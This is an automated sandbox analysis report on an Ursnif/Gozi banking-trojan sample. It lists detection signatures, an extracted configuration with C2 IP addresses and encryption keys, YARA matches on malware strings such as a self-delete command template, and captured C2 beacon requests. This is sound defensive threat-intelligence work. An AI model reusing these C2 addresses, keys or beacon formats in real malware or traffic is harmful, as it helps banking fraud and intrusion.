Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:826050
MD5:0a7efdf643e54621fe9b9e5a29c06faf
SHA1:0db17d1fcb4464120a6f3b088693f7b370fd0153
SHA256:8cfad47521642927f7ab5f7401445393ab916fe2f67072b44cadfa89c11a40fe
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 3396 cmdline: C:\Users\user\Desktop\server.exe MD5: 0A7EFDF643E54621FE9B9E5A29C06FAF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 27 entries
      No Sigma rule has matched
      Timestamp:192.168.2.562.173.142.5149699802033203 03/14/23-09:26:29.644541
      SID:2033203
      Source Port:49699
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.562.173.142.5149699802033204 03/14/23-09:26:29.644541
      SID:2033204
      Source Port:49699
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.594.103.183.15349700802033203 03/14/23-09:26:49.778257
      SID:2033203
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.594.103.183.15349700802033204 03/14/23-09:26:49.778257
      SID:2033204
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.565314294.0000000000550000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00571508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00571508

      Compliance

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49699 -> 62.173.142.51:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49699 -> 62.173.142.51:80
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49700 -> 94.103.183.153:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49700 -> 94.103.183.153:80
      Source: global trafficHTTP traffic detected: GET /drew/LtSfNQUl38_2FDY/ZDiSMzVFZT8P12cRCR/wFifr57eD/E3QMnm3R09oCMKEqF_2B/hL6JR5JZ5RzfthDXDEL/QXKRNOEf5KUe4lOcOOnAWe/S7o7DbUVctcaA/rpMZ8DLG/JY7e7d4k8lkZ3XBI4AKdEOg/JVfUtdkUf4/lNi_2BCjIiDW9oaJC/JQY6K3BrLDok/oxD2Jl0W61e/9srw8Wtoy2vC2X/zMM4BIJQlabgMVrliSBbF/6bQOsnbMJ830WmQE/8fSuWxKUlXv_2FI/uixxrgswLUL3BF62nt/g_2FwBw.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /drew/45gwNn56tT_2B9DMppZLO6W/TY9yvuDrMO/NH6qQboGYLppgh3VY/fD0WTQxe_2Fc/8f_2F5pvK0k/5pc3M5q5_2FYt3/4jI4o0hOzWp0EtrTpDvY_/2BQflNotHm9IIPtO/mq9Dn1qgGdHgrmy/Xs1KDbSG454LVnULzq/seDw5rP1a/cxTqaNB2y_2FVHNjeaDU/t9me_2FSk8oJCJKH9Zx/OgVVwZaLyIQ6GcJMvVJZLX/3Iqej_2B4U8Se/qkLHdDp4/xkbU42A8qDuBydy0uePKn7_/2FGqiSuVoF/gyerokGYzhvdYj/f.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.103.183.153Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: server.exe, 00000000.00000002.565488240.000000000233C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://94.103
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/LtSfNQUl38_2FDY/ZDiSMzVFZT8P12cRCR/wFifr57eD/E3QMnm3R09oCMKEqF_2B/hL6JR5JZ5RzfthDXDEL/QXKRNOEf5KUe4lOcOOnAWe/S7o7DbUVctcaA/rpMZ8DLG/JY7e7d4k8lkZ3XBI4AKdEOg/JVfUtdkUf4/lNi_2BCjIiDW9oaJC/JQY6K3BrLDok/oxD2Jl0W61e/9srw8Wtoy2vC2X/zMM4BIJQlabgMVrliSBbF/6bQOsnbMJ830WmQE/8fSuWxKUlXv_2FI/uixxrgswLUL3BF62nt/g_2FwBw.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /drew/45gwNn56tT_2B9DMppZLO6W/TY9yvuDrMO/NH6qQboGYLppgh3VY/fD0WTQxe_2Fc/8f_2F5pvK0k/5pc3M5q5_2FYt3/4jI4o0hOzWp0EtrTpDvY_/2BQflNotHm9IIPtO/mq9Dn1qgGdHgrmy/Xs1KDbSG454LVnULzq/seDw5rP1a/cxTqaNB2y_2FVHNjeaDU/t9me_2FSk8oJCJKH9Zx/OgVVwZaLyIQ6GcJMvVJZLX/3Iqej_2B4U8Se/qkLHdDp4/xkbU42A8qDuBydy0uePKn7_/2FGqiSuVoF/gyerokGYzhvdYj/f.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.103.183.153Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTR

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00571508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00571508

      System Summary

      barindex
      Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.565314294.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.565392988.0000000000620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.565314294.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
